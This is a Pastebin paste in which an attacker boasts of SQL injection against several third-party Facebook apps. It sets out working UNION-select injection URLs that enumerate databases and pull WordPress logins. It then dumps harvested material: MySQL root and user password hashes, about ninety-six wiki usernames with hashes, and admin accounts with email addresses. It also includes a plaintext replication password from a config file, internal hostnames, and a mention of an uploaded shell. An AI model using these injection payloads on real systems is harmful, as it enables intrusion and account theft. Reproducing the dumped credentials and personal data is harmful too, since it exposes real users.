Advertisement
Guest User

facebook server Got hacked by SQLi

a guest
Jan 26th, 2012
1,085
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Visit Facebook.com
  2.  
  3. Let us search bugs in Web Apps.
  4.  
  5. http://www.facebook.com/robots.txt
  6.  
  7. oooooooooooooooooooooooooooo
  8. User-agent: *
  9. Disallow: /ac.php
  10. Disallow: /ae.php
  11. Disallow: /album.php
  12. Disallow: /ap.php
  13. Disallow: /feeds/
  14. Disallow: /p.php
  15. Disallow: /photo_comments.php
  16. Disallow: /photo_search.php
  17. Disallow: /photos.php
  18.  
  19. User-agent: Slurp
  20. Disallow: /ac.php
  21. Disallow: /ae.php
  22. Disallow: /album.php
  23. Disallow: /ap.php
  24. Disallow: /feeds/
  25. Disallow: /p.php
  26. Disallow: /photo.php
  27. Disallow: /photo_comments.php
  28. Disallow: /photo_search.php
  29. Disallow: /photos.php
  30.  
  31. User-agent: msnbot
  32. Disallow: /ac.php
  33. Disallow: /ae.php
  34. Disallow: /album.php
  35. Disallow: /ap.php
  36. Disallow: /feeds/
  37. Disallow: /p.php
  38. Disallow: /photo.php
  39. Disallow: /photo_comments.php
  40. Disallow: /photo_search.php
  41. Disallow: /photos.php
  42.  
  43. # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
  44. Sitemap: http://www.facebook.com/sitemap.php
  45. 00000000000000000000000000000000
  46.  
  47. nothing interesting =
  48.  
  49. http://apps.facebook.com/tvshowchat/
  50.  
  51. I looked closely, I noticed links
  52.  
  53. http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
  54.  
  55. check:
  56.  
  57. http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
  58.  
  59. ooooooooooooooooooooooooooo
  60.  
  61. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
  62.  
  63. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  64.  
  65. Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  66.  
  67. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  68.  
  69. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
  70.  
  71. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  72.  
  73. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
  74.  
  75. and other....
  76.  
  77. oooooooooooooooooooooooooooo
  78.  
  79. O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
  80.  
  81. Writing exploits, I got the following:
  82.  
  83. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
  84.  
  85. ooooooooooooooooooooooooooo
  86.  
  87. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  88.  
  89. Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  90.  
  91. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  92.  
  93. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  94.  
  95. Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  96.  
  97. 5.0.45-log <= ALERT!!!
  98.  
  99. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  100.  
  101. and other....
  102.  
  103. oooooooooooooooooooooooooooo
  104.  
  105. Database : adminclt_testsite
  106. Database User : adminclt_13@209.68.2.10
  107. MySQL Version : 5.0.67-log
  108.  
  109. super = ] Now, we just can say that there is SQL Injection Vulnerability
  110.  
  111. http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
  112.  
  113. Now we know that there is MySql 5.0.45-log
  114.  
  115. Then let's write another exploit to display tables with information_schema.tables:
  116.  
  117. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
  118.  
  119. oooooooooooooooooooooooooooo
  120.  
  121. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  122.  
  123. Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
  124.  
  125. Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
  126.  
  127. 201 <= ALERT!!! 201 tables!
  128.  
  129. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  130.  
  131. and other....
  132.  
  133. oooooooooooooooooooooooooooo
  134.  
  135. http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
  136.  
  137. Database : adminclt_testsite
  138. Database User : adminclt_13@209.68.2.10
  139. MySQL Version : 5.0.67-log
  140.  
  141. 1) AdCode
  142. 2) AdTrack
  143. 3) Admin_DataStore
  144. 4) Admin_User
  145. 5) Challenges
  146. 6) ChallengesCompleted
  147. 7) Comments
  148. ContactEmails
  149. 9) Content
  150. 10) ContentImages
  151. 11) FeaturedTemplate
  152. 12) FeaturedWidgets
  153. 13) Feeds
  154. 14) FolderLinks
  155. 15) Folders
  156. 16) ForumTopics
  157. 17) Log
  158. 18) LogDumps
  159. 19) Newswire
  160. 20) NotificationMessages
  161. 21) Notifications
  162. 22) Orders
  163. 23) OutboundMessages
  164. 24) Photos
  165. 25) Prizes
  166. 26) RawExtLinks
  167. 27) RawSessions
  168. 28) SessionLengths
  169. 29) Sites
  170. 30) Subscriptions
  171. 31) SurveyMonkeys
  172. 32) SystemStatus
  173. 33) Templates
  174. 34) User
  175. 35) UserBlogs
  176. 36) UserCollectives
  177. 37) UserInfo
  178. 38) UserInvites
  179. 39) Videos
  180. 40) WeeklyScores
  181. 41) Widgets
  182. 42) cronJobs
  183. 43) fbSessions
  184.  
  185. Admin_User
  186.  
  187. 1) id
  188. 2) name
  189. 3) email
  190. 4) password
  191. 5) userid
  192. 6) ncUid
  193. 7) level
  194.  
  195. User
  196.  
  197. 1) userid
  198. 2) ncUid
  199. 3) name
  200. 4) email
  201. 5) isAdmin
  202. 6) isBlocked
  203. 7) votePower
  204. remoteStatus
  205. 9) isMember
  206. 10) isModerator
  207. 11) isSponsor
  208. 12) isEmailVerified
  209. 13) isResearcher
  210. 14) acceptRules
  211. 15) optInStudy
  212. 16) optInEmail
  213. 17) optInProfile
  214. 18) optInFeed
  215. 19) optInSMS
  216. 20) dateRegistered
  217. 21) eligibility
  218. 22) cachedPointTotal
  219. 23) cachedPointsEarned
  220. 24) cachedPointsEarnedThisWeek
  221. 25) cachedPointsEarnedLastWeek
  222. 26) cachedStoriesPosted
  223. 27) cachedCommentsPosted
  224. 28) userLevel
  225.  
  226. http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
  227.  
  228. Current Database : signalpa_fbmFundRraise
  229. Database User : signalpa_rockaja@localhost
  230. MySQL Version : 5.0.85-community
  231.  
  232. DATABASE
  233. 1) information_schema
  234. 2) signalpa_CelebrityPuzzle
  235. 3) signalpa_EBF
  236. 4) signalpa_appNotification
  237. 5) signalpa_appnetwork
  238. 6) signalpa_dailyscriptures
  239. 7) signalpa_ebayfeed
  240. signalpa_fbmFundRraise
  241. 9) signalpa_fbmFundRraisebeta
  242. 10) signalpa_netcards
  243. 11) signalpa_paypal
  244. 12) signalpa_thepuzzle
  245.  
  246. signalpa_fbmFundRraise
  247. 1) Campaigns
  248. 2) Campaigns_Temp
  249. 3) FB_theme
  250. 4) IfundDollars
  251. 5) Languages
  252. 6) Payments
  253. 7) Paymentsoops
  254. Supporters
  255. 9) Users
  256. 10) Withdrawals
  257. 11) invites
  258. 12) invites_copy
  259. 13) mp_passwords
  260. 14) payment_codes
  261. 15) txt_codes
  262. 16) valid_servers
  263. 17) weeklyBonus
  264.  
  265. [+] Column: Users
  266.  
  267. 1) id
  268. 2) name
  269. 3) email
  270. 4) mobile_no
  271. 5) address
  272. 6) country
  273. 7) password
  274. organisation
  275. 9) date_created
  276. 10) date_updated
  277. 11) status
  278. 12) facebook_id
  279. 13) isFacebookFan
  280. 14) verify
  281. 15) paypalUse
  282. 16) paypalEmail
  283. 17) bacUse
  284. 18) bacAcc
  285. 19) bacName
  286. 20) bacLocation
  287. 21) bacCountry
  288. 22) bacIBAN
  289. 23) bacSort_code
  290. 24) current_rank
  291. 25) new_rank
  292. 26) cronjob
  293. 27) max_fundraise
  294.  
  295. [+] Column: mp_passwords
  296. 1) id
  297. 2) password
  298. 3) username
  299. 4) status
  300. 5) number
  301. 6) rc
  302. 7) referer
  303. transID
  304. 9) currency
  305. 10) transType
  306. 11) amount
  307. 12) confirmed
  308. 13) date
  309.  
  310. signalpa_paypal
  311. 1) paypal_cart_info
  312. 2) paypal_payment_info
  313. 3) paypal_subscription_info
  314. [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
  315. [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
  316. [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
  317.  
  318. Column: paypal_cart_info
  319. 1) txnid
  320. 2) itemname
  321. 3) itemnumber
  322. 4) os0
  323. 5) on0
  324. 6) os1
  325. 7) on1
  326. quantity
  327. 9) invoice
  328. 10) custom
  329.  
  330. [+] Column : paypal_payment_info
  331. 1) firstname
  332. 2) lastname
  333. 3) buyer_email
  334. 4) street
  335. 5) city
  336. 6) state
  337. 7) zipcode
  338. memo
  339. 9) itemname
  340. 10) itemnumber
  341. 11) os0
  342. 12) on0
  343. 13) os1
  344. 14) on1
  345. 15) quantity
  346. 16) paymentdate
  347. 17) paymenttype
  348. 18) txnid
  349. 19) mc_gross
  350. 20) mc_fee
  351. 21) paymentstatus
  352. 22) pendingreason
  353. 23) txntype
  354. 24) tax
  355. 25) mc_currency
  356. 26) reasoncode
  357. 27) custom
  358. 28) country
  359. 29) datecreation
  360.  
  361. http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
  362.  
  363. Current Database : tv
  364. Database User : tomkincaid@ps5008.dreamhost.com
  365. MySQL Version : 5.0.45-log
  366.  
  367. [+] DATABASES
  368.  
  369. 1) information_schema
  370. 2) astro
  371. 3) candukincaid
  372. 4) cemeteries
  373. 5) churchwpdb
  374. 6) countdownapp
  375. 7) crush
  376. dare
  377. 9) friendiq
  378. 10) giants
  379. 11) hookup
  380. 12) jauntlet
  381. 13) loccus
  382. 14) luciacanduwp
  383. 15) maps
  384. 16) martisor
  385. 17) mediax
  386. 18) mostlikely
  387. 19) music
  388. 20) pimpfriends
  389. 21) plans
  390. 22) politicsapp
  391. 23) postergifts
  392. 24) posters2
  393. 25) projectbasecamp
  394. 26) pwnfriends
  395. 27) quiz
  396. 28) seeall
  397. 29) send
  398. 30) supporter
  399. 31) swapu
  400. 32) tomsapps
  401. 33) travelbug
  402.  
  403. [+] tab.send
  404.  
  405. 1) app
  406. 2) item
  407. 3) itemforuser
  408. 4) neverblue
  409. 5) user
  410.  
  411. [+] Columns
  412. user(12454)
  413.  
  414. 1) userid
  415. 2) siteid
  416. 3) appkey
  417. 4) session
  418. 5) points
  419. 6) added
  420. 7) removed
  421.  
  422. Tab. candukincaid
  423.  
  424. 1) wp_comments
  425. 2) wp_links
  426. 3) wp_options
  427. 4) wp_post****
  428. 5) wp_posts
  429. 6) wp_px_albumPhotos
  430. 7) wp_px_albums
  431. wp_px_galleries
  432. 9) wp_px_photos
  433. 10) wp_px_plugins
  434. 11) wp_term_relationships
  435. 12) wp_term_taxonomy
  436. 13) wp_terms
  437. 14) wp_user****
  438. 15) wp_users
  439.  
  440. [+]Column wp_users
  441.  
  442. 1) ID
  443. 2) user_login
  444. 3) user_pass
  445. 4) user_nicename
  446. 5) user_email
  447. 6) user_url
  448. 7) user_registered
  449. user_activation_key
  450. 9) user_status
  451. 10) display_name
  452.  
  453. etc...
  454.  
  455. http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
  456.  
  457. > ~ inj3ct0r_facebook_exploit [ENTER]
  458.  
  459. root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
  460. slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
  461. muu:*74A45B921A1A918B18AE9B137396E5A67E006262
  462. monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
  463. maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
  464.  
  465. http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
  466.  
  467. Database: affinispac_fb
  468. User: affinispac_fb@localhost
  469. Version: 5.0.67-community
  470.  
  471. http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
  472.  
  473. >plucky@localhost : facebook : 4.0.13-log
  474.  
  475. etc... =]
  476.  
  477. Next xD
  478.  
  479. Database: thetvdb
  480. User: thetvdb@localhost
  481. Version: 5.0.51a-24-log
  482.  
  483. [Database]: thetvdb
  484.  
  485. [Table]
  486.  
  487. [1]aka_seriesname
  488. [2]apiusers
  489. [3]banners
  490. [4]deletions
  491. [5]genres
  492. [6]imgstatus
  493. [7]languages
  494. [8]mirrors
  495. [9]networks
  496. [10]ratings
  497. [11]runtimes
  498. [12]seriesactors
  499. [13]seriesupdates
  500. [14]translation_episodename
  501. [15]translation_episodeoverview
  502. [16]translation_labels
  503. [17]translation_seriesname
  504. [18]translation_seriesoverview
  505. [19]tvepisodes
  506. [20]tvseasons
  507. [21]tvseries
  508. [22]user_episodes
  509. [23]users
  510.  
  511. users:
  512.  
  513. id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
  514. favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
  515. lastupdatedby_admin,mirrorupdate
  516.  
  517. [userpass]
  518.  
  519. [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
  520. [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
  521. [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
  522. [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
  523. [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
  524. [6] 3d801aa532c1cec3ee82d87a99fdf63f
  525.  
  526. [Database]: wiki
  527.  
  528. [Table]
  529.  
  530. [24]archive
  531. [25]categorylinks
  532. [26]externallinks
  533. [27]filearchive
  534. [28]hitcounter
  535. [29]image
  536. [30]imagelinks
  537. [31]interwiki
  538. [32]ipblocks
  539. [33]job
  540. [34]langlinks
  541. [35]logging
  542. [36]math
  543. [37]objectcache
  544. [38]oldimage
  545. [39]page
  546. [40]page_restrictions
  547. [41]pagelinks
  548. [42]querycache
  549. [43]querycache_info
  550. [44]querycachetwo
  551. [45]recentchanges
  552. [46]redirect
  553. [47]revision
  554. [48]searchindex
  555. [49]site_stats
  556. [50]templatelinks
  557. [51]text
  558. [52]trackbacks
  559. [53]transcache
  560. [54]user
  561. [55]user_groups
  562. [56]user_newtalk
  563. [57]watchlist
  564.  
  565. user:
  566.  
  567. user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
  568. user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
  569. user_email_token_expires,user_registration,user_editcount
  570.  
  571. ['user_name'] : ['user_pass']
  572.  
  573. [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
  574. [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
  575. [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
  576. [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
  577. [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
  578. [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
  579. [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
  580. [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
  581. [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
  582. [10] Bsudbury: [10] 827d07956629c37855f3518374821872:
  583. [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
  584. [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
  585. [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
  586. [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
  587. [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
  588. [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
  589. [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
  590. [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
  591. [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
  592. [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
  593. [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
  594. [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
  595. [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
  596. [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
  597. [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
  598. [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
  599. [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
  600. [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
  601. [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
  602. [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
  603. [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
  604. [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
  605. [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
  606. [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
  607. [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
  608. [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
  609. [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
  610. [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
  611. [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
  612. [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
  613. [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
  614. [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
  615. [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
  616. [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
  617. [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
  618. [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
  619. [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
  620. [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
  621. [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
  622. [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
  623. [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
  624. [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
  625. [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
  626. [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
  627. [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
  628. [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
  629. [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
  630. [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
  631. [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
  632. [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
  633. [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
  634. [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
  635. [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
  636. [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
  637. [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
  638. [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
  639. [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
  640. [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
  641. [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
  642. [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
  643. [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
  644. [72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
  645. [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
  646. [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
  647. [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
  648. [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
  649. [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
  650. [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
  651. [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
  652. [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
  653. [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
  654. [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
  655. [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
  656. [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
  657. [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
  658. [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
  659. [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
  660. [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
  661. [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
  662. [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
  663. [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
  664. [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
  665. [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
  666. [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
  667. [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
  668. [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
  669.  
  670. ---------------------------------------------------------------------------------------------------------------------------------------------------
  671.  
  672. read /etc/hosts
  673.  
  674. 127.0.0.1 localhost localhost.localdomain
  675. 192.168.1.167 140696-db2.flufffriends.com 140696-db2
  676. 192.168.1.166 140695-db1.flufffriends.com 140695-db1
  677. 192.168.1.165 140694-web2.flufffriends.com 140694-web2
  678. 192.168.1.164 140693-web1.flufffriends.com 140693-web1
  679. 69.63.176.141 api.facebook.com
  680. 208.116.17.80 peanutlabs.com
  681.  
  682. ----------------------------------
  683.  
  684. /etc/my.cnf
  685.  
  686. #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
  687.  
  688. log-bin=/var/lib/mysqllogs/bin-log
  689.  
  690. binlog-do-db=fluff2
  691.  
  692. expire-logs-days=14
  693.  
  694. server-id = 5
  695.  
  696. #master-host=69.63.176.141
  697.  
  698. #master-user=romis_user
  699.  
  700. #master-password=romis0123
  701.  
  702. #master-connect-retry=60
  703.  
  704. replicate-do-db=miserman
  705.  
  706. #log-slave-updates
  707.  
  708. expire_logs_days = 14
  709.  
  710. I think we found a sufficient number of vulnerabilities!
  711.  
  712. So .. Moving on to the fun friends
  713.  
  714. To avoid Vandal effects of script-kidds I will not give you a link to shell.php
  715. wp_posts
  716.  
  717. post_password
  718.  
  719. wp_users
  720.  
  721. user_pass
  722.  
  723. done.....
  724.  
  725. WordPress! oO one of the modules installed in facebook is WordPress!
  726.  
  727. check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
  728.  
  729. oooooooooooooooooooooooooooo
  730.  
  731. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  732.  
  733. Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  734.  
  735. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  736.  
  737. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  738.  
  739. Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
  740.  
  741. 3 <= ALERT! Users! =]
  742.  
  743. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  744.  
  745. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
  746.  
  747. oooooooooooooooooooooooooooo
  748.  
  749. ..> Inj3ct0r_Crach_exploit [ENTER]
  750.  
  751. user:
  752.  
  753. admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
  754. lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
  755. tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
  756.  
  757. cracker:
  758.  
  759. admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
  760. lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
  761. tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com
  762.  
  763. see request:
  764.  
  765. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
  766.  
  767. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
  768.  
  769. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
  770.  
  771. goOd =] Nice Hacking old school xD
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement